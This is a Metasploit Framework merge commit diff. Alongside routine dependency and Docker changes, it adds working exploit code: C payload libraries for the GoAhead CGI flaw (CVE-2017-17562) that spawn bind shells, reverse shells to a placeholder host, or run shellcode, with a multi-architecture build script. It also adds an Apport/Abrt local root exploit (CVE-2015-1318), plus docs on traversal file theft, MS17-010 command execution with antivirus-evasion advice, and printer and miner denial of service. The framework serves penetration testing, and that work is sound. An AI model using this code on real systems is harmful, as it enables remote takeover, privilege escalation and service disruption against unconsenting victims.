Merge branch 'rapid7/master' into goliath

.ruby-version

@@ -1 +1 @@
-2.4.2
+2.4.3

.travis.yml

@@ -12,8 +12,8 @@ addons:
 language: ruby
 rvm:
   - '2.2'
-  - '2.3.5'
-  - '2.4.2'
+  - '2.3.6'
+  - '2.4.3'
 
 env:
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'

Dockerfile

@@ -1,9 +1,8 @@
-FROM ruby:2.4.2-alpine
+FROM ruby:2.4.3-alpine3.7
 LABEL maintainer="Rapid7"
 
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
 ENV APP_HOME /usr/src/metasploit-framework/
-ENV MSF_USER msf
 ENV NMAP_PRIVILEGED=""
 ENV BUNDLE_IGNORE_MESSAGES="true"
 WORKDIR $APP_HOME
@@ -15,19 +14,23 @@ COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
 
 RUN apk update && \
     apk add \
+      bash \
       sqlite-libs \
       nmap \
       nmap-scripts \
       nmap-nselibs \
       postgresql-libs \
+      python \
+      python3 \
       ncurses \
       libcap \
+      su-exec \
     && apk add --virtual .ruby-builddeps \
       autoconf \
       bison \
       build-base \
       ruby-dev \
-      openssl-dev \
+      libressl-dev \
       readline-dev \
       sqlite-dev \
       postgresql-dev \
@@ -45,13 +48,16 @@ RUN apk update && \
     && apk del .ruby-builddeps \
     && rm -rf /var/cache/apk/*
 
-RUN adduser -g msfconsole -D $MSF_USER
-
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
 
-USER $MSF_USER
-
 ADD ./ $APP_HOME
 
+# we need this entrypoint to dynamically create a user
+# matching the hosts UID and GID so we can mount something
+# from the users home directory. If the IDs don't match
+# it results in access denied errors. Once docker has
+# a solution for this we can revert it back to normal
+ENTRYPOINT ["docker/entrypoint.sh"]
+
 CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]

Gemfile.lock

@@ -18,9 +18,9 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.25)
+      metasploit-payloads (= 1.3.29)
       metasploit_data_models
-      metasploit_payloads-mettle (= 0.3.3)
+      metasploit_payloads-mettle (= 0.3.7)
       mqtt
       msgpack
       nessus_rest
@@ -38,7 +38,6 @@ PATH
       pg (= 0.20.0)
       railties
       rb-readline
-      rbnacl (< 5.0.0)
       recog
       redcarpet
       rex-arch
@@ -59,6 +58,7 @@ PATH
       rex-struct2
       rex-text
       rex-zip
+      ruby-macho
       ruby_smb
       rubyntlm
       rubyzip
@@ -73,7 +73,7 @@ PATH
 GEM
   remote: https://rubygems.org/
   specs:
-    Ascii85 (1.0.2)
+    Ascii85 (1.0.3)
     actionpack (4.2.10)
       actionview (= 4.2.10)
       activesupport (= 4.2.10)
@@ -103,12 +103,12 @@ GEM
       public_suffix (>= 2.0.2, < 4.0)
     afm (0.2.2)
     arel (6.0.4)
-    arel-helpers (2.5.0)
+    arel-helpers (2.6.1)
       activerecord (>= 3.1.0, < 6)
-    backports (3.11.0)
+    backports (3.11.1)
     bcrypt (3.1.11)
     bcrypt_pbkdf (1.0.0)
-    bindata (2.4.1)
+    bindata (2.4.2)
     bit-struct (0.16)
     builder (3.2.3)
     coderay (1.1.2)
@@ -129,7 +129,6 @@ GEM
       i18n (>= 0.7)
     faraday (0.13.1)
       multipart-post (>= 1.2, < 3)
-    ffi (1.9.18)
     filesize (0.1.1)
     fivemat (1.3.5)
     google-protobuf (3.5.1)
@@ -183,7 +182,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.25)
+    metasploit-payloads (1.3.29)
     metasploit_data_models (2.0.16)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -194,7 +193,7 @@ GEM
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.3.3)
+    metasploit_payloads-mettle (0.3.7)
     method_source (0.9.0)
     mini_portile2 (2.3.0)
     minitest (5.11.1)
@@ -253,8 +252,6 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (12.3.0)
     rb-readline (0.5.5)
-    rbnacl (4.0.2)
-      ffi
     recog (2.1.17)
       nokogiri
     redcarpet (3.4.0)
@@ -328,6 +325,7 @@ GEM
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
     rspec-support (3.7.0)
+    ruby-macho (1.1.0)
     ruby-rc4 (0.1.5)
     ruby_smb (0.0.18)
       bindata
@@ -365,7 +363,7 @@ GEM
     ttfunk (1.5.1)
     tzinfo (1.2.4)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2017.3)
+    tzinfo-data (1.2018.3)
       tzinfo (>= 1.0.0)
     windows_error (0.1.2)
     xdr (2.0.0)

LICENSE

@@ -75,6 +75,10 @@ Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1
 
+Files: lib/msf/core/modules/external/python/async_timeout/*
+Copyright: 2016-2017 Andrew Svetlov
+License: Apache 2.0
+
 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby

data/exploits/CVE-2017-17562/build.sh

@@ -0,0 +1,48 @@
+#!/bin/bash
+
+build () {
+  CC=$1
+  TARGET_SUFFIX=$2
+  CFLAGS=$3
+
+  echo "[*] Building for ${TARGET_SUFFIX}..."
+  for type in {shellcode,system,reverse,bind}
+   do ${CC} ${CFLAGS} -Wall -fPIC -fno-stack-protector -Os goahead-cgi-${type}.c -s -shared -o goahead-cgi-${type}-${TARGET_SUFFIX}.so
+  done
+}
+
+rm -f *.o *.so *.gz
+
+#
+# Linux GLIBC
+#
+
+# x86
+build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
+build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
+
+# ARM
+build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
+build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
+build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
+
+# MIPS
+build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
+build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
+build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
+build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
+
+# SPARC
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
+
+# PowerPC
+build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
+build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
+build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
+
+# S390X
+build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
+
+gzip -9 *.so
+rm -f *.o *.so

data/exploits/CVE-2017-17562/goahead-cgi-bind.c

@@ -0,0 +1,96 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _bind_tcp_shell(void) {
+
+  int sfd, fd, i;
+  struct sockaddr_in addr,saddr;
+  unsigned int saddr_len = sizeof(struct sockaddr_in);
+
+  char *lport = "55555";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  sfd = socket(AF_INET, SOCK_STREAM, 0);
+  setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
+
+  saddr.sin_family = AF_INET;
+  saddr.sin_port = htons(atoi(lport));
+  saddr.sin_addr.s_addr = INADDR_ANY;
+  bzero(&saddr.sin_zero, 8);
+
+  if (bind(sfd, (struct sockaddr *) &saddr, saddr_len) == -1) {
+    exit(1);
+  }
+
+  if (listen(sfd, 5) == -1) {
+    close(sfd);
+    exit(1);
+  }
+
+  fd = accept(sfd, (struct sockaddr *) &addr, &saddr_len);
+  close(sfd);
+
+  if (fd == -1) {
+    exit(1);
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _bind_tcp_shell();
+
+    exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-reverse.c

@@ -0,0 +1,84 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _reverse_tcp_shell(void) {
+
+  int fd, i;
+  struct sockaddr_in addr;
+  char *lport = "55555";
+  char *lhost = "000.000.000.000";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  fd = socket(PF_INET, SOCK_STREAM, 0);
+  addr.sin_port = htons(atoi(lport));
+  addr.sin_addr.s_addr = inet_addr(lhost);
+  addr.sin_family = AF_INET;
+
+  memset(addr.sin_zero, 0, sizeof(addr.sin_zero));
+
+  for (i=0; i<10; i++) {
+    if (! connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr))) {
+      break;
+    }
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _reverse_tcp_shell();
+
+    exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-shellcode.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <signal.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver mmap,mmap@GLIBC_2.0");
+__asm__(".symver memcpy,memcpy@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver mmap,mmap@GLIBC_2.2.5");
+__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+  void *mem;
+  void (*fn)();
+
+  unsetenv("LD_PRELOAD");
+
+  mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
+  if (mem == MAP_FAILED)
+    return;
+
+  memcpy(mem, payload, PAYLOAD_SIZE);
+  fn = (void(*)())mem;
+
+  if (! fork())
+    fn();
+
+  exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-system.c

@@ -0,0 +1,32 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    int dummy = 0;
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      dummy = system((const char*)payload);
+
+    exit(dummy);
+}

data/exploits/CVE-2017-17562/install-deps.sh

@@ -0,0 +1,21 @@
+#!/bin/bash
+
+# Assume x86_64 Ubuntu 16.04 base system
+apt-get install build-essential \
+  gcc-5-multilib \
+  gcc-5-multilib-arm-linux-gnueabi \
+  gcc-5-multilib-arm-linux-gnueabihf \
+  gcc-5-multilib-mips-linux-gnu \
+  gcc-5-multilib-mips64-linux-gnuabi64 \
+  gcc-5-multilib-mips64el-linux-gnuabi64 \
+  gcc-5-multilib-mipsel-linux-gnu \
+  gcc-5-multilib-powerpc-linux-gnu \
+  gcc-5-multilib-powerpc64-linux-gnu \
+  gcc-5-multilib-s390x-linux-gnu \
+  gcc-5-multilib-sparc64-linux-gnu \
+  gcc-4.9-powerpc64le-linux-gnu \
+  gcc-4.9-aarch64-linux-gnu
+
+if [ ! -e /usr/include/asm ];
+  then ln -sf /usr/include/asm-generic /usr/include/asm
+fi

data/exploits/cve-2015-1318/newpid.c

@@ -0,0 +1,143 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <err.h>
+#include <syslog.h>
+#include <sched.h>
+#include <linux/sched.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+ 
+//
+// Apport/Abrt Vulnerability Demo Exploit.
+//
+//  Apport: CVE-2015-1318
+//  Abrt:   CVE-2015-1862
+// 
+//   -- taviso@cmpxchg8b.com, April 2015.
+//
+// $ gcc -static newpid.c
+// $ ./a.out
+// uid=0(root) gid=0(root) groups=0(root)
+// sh-4.3# exit
+// exit
+//
+// Hint: To get libc.a,
+//  yum install glibc-static or apt-get install libc6-dev
+//
+
+//
+// Modified for Metasploit. Original exploit:
+// - https://www.exploit-db.com/exploits/36746/
+//
+ 
+int main(int argc, char **argv)
+{
+    int status;
+    pid_t wrapper;
+    pid_t init;
+    pid_t subprocess;
+    unsigned i;
+
+    // If we're root, then we've convinced the core handler to run us,
+    // so create a setuid root executable that can be used outside the chroot.
+    if (getuid() == 0) {
+        if (chown("sh", 0, 0) != 0)
+            exit(EXIT_FAILURE);
+ 
+        if (chmod("sh", 04755) != 0)
+            exit(EXIT_FAILURE);
+ 
+        return EXIT_SUCCESS;
+    }
+ 
+    // If I'm not root, but euid is 0, then the exploit worked and we can spawn
+    // a shell and cleanup.
+    if (setuid(0) == 0) {
+        system("id");
+        system("rm -rf exploit");
+        execlp("sh", "sh", NULL);
+ 
+        // Something went wrong.
+        err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked");
+    }
+ 
+    // It looks like the exploit hasn't run yet, so create a chroot.
+    if (mkdir("exploit", 0755) != 0
+     || mkdir("exploit/usr", 0755) != 0
+     || mkdir("exploit/usr/share", 0755) != 0
+     || mkdir("exploit/usr/share/apport", 0755) != 0
+     || mkdir("exploit/usr/libexec", 0755) != 0) {
+        err(EXIT_FAILURE, "failed to create chroot directory");
+    }
+ 
+    // Create links to the exploit locations we need.
+    if (link(*argv, "exploit/sh") != 0
+     || link(*argv, "exploit/usr/share/apport/apport") != 0        // Ubuntu
+     || link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) {  // Fedora
+        err(EXIT_FAILURE, "failed to create required hard links");
+    }
+ 
+    // Create a subprocess so we don't enter the new namespace.
+    if ((wrapper = fork()) == 0) {
+ 
+        // In the child process, create a new pid and user ns. The pid
+        // namespace is only needed on Ubuntu, because they check for %P != %p
+        // in their core handler. On Fedora, just a user ns is sufficient.
+        if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0)
+            err(EXIT_FAILURE, "failed to create new namespace");
+ 
+        // Create a process in the new namespace.
+        if ((init = fork()) == 0) {
+ 
+            // Init (pid 1) signal handling is special, so make a subprocess to
+            // handle the traps.
+            if ((subprocess = fork()) == 0) {
+                // Change /proc/self/root, which we can do as we're privileged
+                // within the new namepace.
+                if (chroot("exploit") != 0) {
+                    err(EXIT_FAILURE, "chroot didnt work");
+                }
+ 
+                // Now trap to get the core handler invoked.
+                __builtin_trap();
+ 
+                // Shouldn't happen, unless user is ptracing us or something.
+                err(EXIT_FAILURE, "coredump failed, were you ptracing?");
+            }
+ 
+            // If the subprocess exited with an abnormal signal, then everything worked.
+            if (waitpid(subprocess, &status, 0) == subprocess)    
+                return WIFSIGNALED(status)
+                        ? EXIT_SUCCESS
+                        : EXIT_FAILURE;
+ 
+            // Something didn't work.
+            return EXIT_FAILURE;
+        }
+ 
+        // The new namespace didn't work.
+        if (waitpid(init, &status, 0) == init)
+            return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS
+                    ? EXIT_SUCCESS
+                    : EXIT_FAILURE;
+ 
+        // Waitpid failure.
+        return EXIT_FAILURE;
+    }
+ 
+    // If the subprocess returned sccess, the exploit probably worked,
+    // reload with euid zero.
+    if (waitpid(wrapper, &status, 0) == wrapper) {
+        // All done, spawn root shell.
+        if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
+            execl(*argv, "w00t", NULL);
+        }
+    }
+ 
+    // Unknown error.
+    errx(EXIT_FAILURE, "unexpected result, cannot continue");
+}

data/markdown_doc/default_template.erb

@@ -1,11 +1,9 @@
 ## <%= items[:mod_name] %>
-<p>
 <%= normalize_description(items[:mod_description]) %>
-</p>
 
 ## Module Name
 
-<%= Rex::Text.html_encode(items[:mod_fullname]) %>
+<%= CGI::escapeHTML(items[:mod_fullname]) %>
 
 ## Authors
 
@@ -47,4 +45,4 @@ No options required.
 
 ## Basic Usage
 
-<%= normalize_demo_output(items[:mod_demo]) %>
+<%= normalize_demo_output(items[:mod_demo]) %>

data/markdown_doc/html_template.erb

@@ -65,4 +65,4 @@
 </div>
 <% end %>
 </body>
-</html>
+</html>

docker/README.md

@@ -3,24 +3,27 @@
 
 To run `msfconsole`
 ```bash
-docker-compose build
-docker-compose run --rm --service-ports ms
-```
-or
-```bash
 ./docker/bin/msfconsole
 ```
 
-To run `msfvenom`
+or
+
 ```bash
 docker-compose build
-docker-compose run --rm --no-deps ms ./msfvenom
+docker-compose run --rm --service-ports -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms
 ```
-or
+To run `msfvenom`
 ```bash
 ./docker/bin/msfvenom
 ```
 
+or
+
+```bash
+docker-compose build
+docker-compose run --rm --no-deps -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms ./msfvenom
+```
+
 You can pass any command line arguments to the binstubs or the docker-compose command and they will be passed to `msfconsole` or `msfvenom`. If you need to rebuild an image (for example when the Gemfile changes) you need to build the docker image using `docker-compose build` or supply the `--rebuild` parameter to the binstubs.
 
 ### But I want reverse shells...

docker/bin/msfconsole

@@ -27,4 +27,4 @@ if [[ $PARAMS == *"--rebuild"* ]]; then
   exit $?
 fi
 
-docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"
+docker-compose run --rm --service-ports -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"

docker/entrypoint.sh

@@ -0,0 +1,20 @@
+#!/bin/bash
+
+MSF_USER=msf
+MSF_GROUP=msf
+TMP=${MSF_UID:=1000}
+TMP=${MSF_GID:=1000}
+
+# don't recreate system users like root
+if [ "$MSF_UID" -lt "1000" ]; then
+  MSF_UID=1000
+fi
+
+if [ "$MSF_GID" -lt "1000" ]; then
+  MSF_GID=1000
+fi
+
+addgroup -g $MSF_GID $MSF_GROUP
+adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
+
+su-exec $MSF_USER "$@"

documentation/modules/auxiliary/admin/http/ulterius_file_download.md

@@ -0,0 +1,64 @@
+## Description
+
+This module exploits a directory traversal vulnerability in [Ulterius Server < v1.9.5.0](https://github.com/Ulterius/server/releases). The directory traversal flaw occurs in Ulterius Server's `HttpServer.Process` function call. While processing file requests, the `HttpServer.Process` function does not validate that the requested file is within the web server's root directory or a subdirectory.
+
+## Vulnerable Application
+
+When requesting a file, a relative or absolute file path is needed so the appropriate request can be generated. Fortunately, Ulterius Server creates a file called `fileIndex.db`, which contains filenames and directories located on the server. By requesting `fileIndex.db` and parsing the retrieved data, absolute file paths can be retrieved for files hosted on the server. Using the information retrieved from parsing `fileIndex.db`, additional requests can be generated to download desired files.
+
+As noted in the [EDB PoC](https://www.exploit-db.com/exploits/43141/), the `fileIndex.db` is usually located at:
+
+`http://ulteriusURL:22006/.../fileIndex.db`
+
+Note: 22006 was the default port after setting up the Ulterius Server.
+
+After retrieving absolute paths for files, the files can be retrieved by sending requests of the form:
+
+`http://ulteriusURL:22006/<DriveLetter>:/<path>/<to>/<file>`
+
+Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative paths to download files but absolute paths can be used on Windows-platforms as well, because the `HttpServer.Process` function made use of the [Path.Combine](https://msdn.microsoft.com/en-us/library/fyy7a5kt(v=vs.110).aspx) function.
+
+> If *path2* includes a root, *path2* is returned. 
+
+## Options
+
+**PATH**
+
+This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`)
+
+Note: If you are using relative paths, use three periods when traversing down a level in the directory structure. If absolute paths are used, make sure to include the drive letter.
+
+## Verification Steps
+
+- [ ] Install Ulterius Server < v1.9.5.0
+- [ ] `./msfconsole`
+- [ ] `use auxiliary/admin/http/ulterius_file_download`
+- [ ] `set rhost <rhost>`
+- [ ] `run`
+- [ ] Verify loot contains file system paths from remote file system.
+- [ ] `set path '<DriveLetter>:/<path>/<to>/<file>'`
+- [ ] `run`
+- [ ] Verify contents of file
+
+## Scenarios
+
+### Ulterius Server v1.8.0.0 on Windows 7 SP1 x64.
+
+```
+msf5 > use auxiliary/admin/http/ulterius_file_download
+msf5 auxiliary(admin/http/ulterius_file_download) > set rhost 172.22.222.122
+rhost => 172.22.222.122
+msf5 auxiliary(admin/http/ulterius_file_download) > run
+
+[*] Starting to parse fileIndex.db...
+[*] Remote file paths saved in: filepath0
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt'
+path => C:/users/pwnduser/desktop/tmp.txt
+msf5 auxiliary(admin/http/ulterius_file_download) > run
+
+[*] C:/users/pwnduser/desktop/tmp.txt
+[*] File contents saved: filepath1
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/ulterius_file_download) >
+```

documentation/modules/auxiliary/admin/smb/ms17_010_command.md

@@ -0,0 +1,86 @@
+## Introduction
+
+MS17-010 and psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
+
+You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
+
+* CVE-2017-0146 (EternalChampion/EternalSynergy) - exploit a race condition with Transaction requests
+* CVE-2017-0143 (EternalRomance/EternalSynergy) - exploit a type confusion between WriteAndX and Transaction requests
+
+This module is highly reliable and preferred over EternalBlue where a Named Pipe is accessible for anonymous logins (generally, everything pre-Vista, and relatively common for domain computers in the wild).
+
+## Vulnerable Server
+
+To be able to use auxiliary/admin/smb/ms17_010_command:
+
+1. You can OPTIONALLY use a valid username/password to bypass most of these requirements.
+2. The firewall must allow SMB traffic.
+3. The target must use SMBv1.
+4. The target must be missing the MS17-010 patch.
+5. The target must allow anonymous IPC$ and a Named Pipe.
+
+You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.
+
+## Verification Steps
+
+At the minimum, you should be able use psexec to get a session with a valid credential using the following:
+
+```
+msf > use auxiliary/admin/smb/ms17_010_command
+msf exploit(psexec) > set RHOSTS 192.168.1.80
+RHOSTS => 192.168.1.80
+msf exploit(psexec) > exploit
+```
+
+## Options
+
+By default, using auxiliary/admin/smb/ms17_010_command can be as simple as setting the RHOSTS option, and you're ready to go.
+
+**The NAMEDPIPE Option**
+
+By default, the module will scan for a list of common pipes for any available one. You can specify one by name.
+
+**The LEAKATTEMPTS Option**
+
+Information leaks are used to ensure stability of the exploit. Sometimes they don't pop on the first try.
+
+**The DBGTRACE Option**
+
+Used to debug, gives extremely verbose information.
+
+**The SMBUser Option**
+
+This is a valid Windows username.
+
+**The SMBPass option**
+
+This can be either the plain text version or the Windows hash.
+
+## Scenarios
+
+**Automatic Target**
+
+There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below.
+
+**Powershell Target**
+
+The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by default.
+
+Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports Powershell before it tries it; the manually set Powershell target won't do that.
+
+**Native Upload Target**
+
+The Native target will attempt to upload the payload (executable) to SYSTEM32 (which can be modified with the
+SHARE datastore option), and then execute it with psexec.
+
+This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option.
+
+**MOF Upload Target**
+
+The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object
+format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get a session.
+
+Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting
+caught by antivirus on the target.
+
+The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template datastore options or you can supply your own custom EXE by setting the EXE::Custom option.

documentation/modules/auxiliary/dos/http/brother_debut_dos.md

@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+  Versions <= 1.20 of the Debut embedded httpd web server in use by Brother printers are vulnerable to denial of service 
+  via a crafted HTTP request. This module will render the printer unresponsive from requests for ~300 seconds.
+  This is thought to be caused by a single threaded web server which
+  has a ~300 second timeout value.  By sending a request with a content-length larger than the actual data, the server waits
+  to receive the rest of the data, which doesn't happen until the timeout occurs.  This DoS is for all services, not just http.
+
+  This module was successfully tested against a Brother HL-L2380DW series.
+
+  An nmap version scan of the vulnerable service should look similar to:
+  `80/tcp open  http    Debut embedded httpd 1.20 (Brother/HP printer http admin)`.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/dos/http/brother_debut_dos```
+  3. Do: ```set rhost [ip]```
+  4. Do: ```run```
+  5. You should see Success, and manual attempts to browse the web interface don't load.
+
+## Scenarios
+
+### Brother HL-L2380DW with Debut embedded 1.20
+
+```
+resource (brother.rc)> use auxiliary/dos/http/brother_debut_dos
+resource (brother.rc)> set rhost 1.1.1.1
+rhost => 1.1.1.1
+resource (brother.rc)> exploit
+[*] Sending malformed POST request at 2018-01-24 20:45:52.
+[+] 1.1.1.1:80 - Connection Refused: Success! Server will recover about 2018-01-24 20:50:52
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/dos/tcp/claymore.md

@@ -0,0 +1,38 @@
+## Vulnerable Application
+
+Vulnerable application versions include:
+Claymore Dual GPU Miner<=10.5
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/dos/tcp/claymore_doc`
+3. Do: `set rhost`
+4. Do: `run`
+5. check your miner.
+
+## Scenarios
+
+### Claymore Dual GPU Miner/10.0 - window7
+
+```
